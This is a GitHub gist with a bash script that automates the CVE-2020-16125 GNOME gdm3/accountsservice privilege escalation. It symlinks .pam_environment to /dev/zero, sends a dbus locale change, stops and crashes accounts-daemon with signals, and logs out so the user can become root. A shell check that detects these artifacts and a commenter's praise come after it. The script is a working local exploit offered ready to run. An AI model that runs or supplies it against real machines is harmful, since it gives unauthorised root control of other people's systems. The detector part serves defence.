@mcorybillington
Last active June 14, 2021 14:17
Quick script to automate CVE-2020-16125 Gnome gdm3 privilege escalation. Credit for discovery to Kevin Backhouse and GitHub Security Lab. Original writeup: https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE
#!/bin/bash
# Credit to Kevin Backhouse and GitHub Security Lab, I just scripted this...
# Original writeup: https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE
# CVE-2020-16125
echo "[+] Creating symlink"
ln -s /dev/zero .pam_environment;
echo "[+] Changing region"
(dbus-send --print-reply --system --dest=org.freedesktop.Accounts /org/freedesktop/Accounts/User$UID org.freedesktop.Accounts.User.SetFormatsLocale string:'en_GB.UTF-8')&
echo "[+] Removing symlink"
rm .pam_environment
ACCOUNTS_DAEMON_PID=`pidof accounts-daemon`
echo "[+] Killing accounts-daemon PID: $ACCOUNTS_DAEMON_PID"
kill -SIGSTOP $ACCOUNTS_DAEMON_PID
(nohup bash -c "sleep 3s; kill -SIGSEGV $ACCOUNTS_DAEMON_PID; kill -SIGCONT $ACCOUNTS_DAEMON_PID")&
echo "[+] Logging out so you can become root"
sleep 1
gnome-session-quit --logout --no-prompt
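A defender-side check for the two host artifacts the script above produces, a `.pam_environment` that is not a regular file and an `accounts-daemon` held in the stopped state. This is an added example, not part of the original gist; the function names and the `--scan` argument are assumptions made for illustration.

```sh
#!/bin/sh
# Added defensive example (not from the original gist).
# Both artifacts are short-lived in the script above, so these checks belong
# in something that runs continuously (file watch, EDR rule, audit hook);
# a one-off scan only catches leftovers.

# Classify <home>/.pam_environment.
# Prints: absent | regular | symlink:<target> | special
classify_pam_env() (
    f="$1/.pam_environment"
    if [ -L "$f" ]; then
        printf 'symlink:%s\n' "$(readlink -- "$f")"
    elif [ ! -e "$f" ]; then
        echo absent
    elif [ -f "$f" ]; then
        echo regular
    else
        echo special      # device node, FIFO, directory, ...
    fi
)

# Print the one-letter state from a /proc/<pid>/status style file.
proc_state() {
    awk '/^State:/ {print $2; exit}' "$1"
}

# Walk a passwd-format file and report homes with a non-regular file.
scan_homes() (
    passwd="${1:-/etc/passwd}"
    while IFS=: read -r user pw uid gid gecos home shell; do
        [ -d "$home" ] || continue
        verdict=$(classify_pam_env "$home")
        case "$verdict" in
            symlink:*|special)
                echo "ALERT $user $home/.pam_environment $verdict" ;;
        esac
    done < "$passwd"
)

# Report any accounts-daemon process that is stopped (state T).
check_accounts_daemon() (
    for pid in $(pidof accounts-daemon 2>/dev/null); do
        st=$(proc_state "/proc/$pid/status")
        [ "$st" = "T" ] && echo "ALERT accounts-daemon pid $pid is stopped"
    done
    exit 0
)

# Run the live checks only when asked to, e.g. `sh check.sh --scan`.
case "${1:-}" in --scan) scan_homes; check_accounts_daemon ;; esac
```
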
@deathflash1411

Why don't you submit this to exploit-db, it's a pretty good script 👍
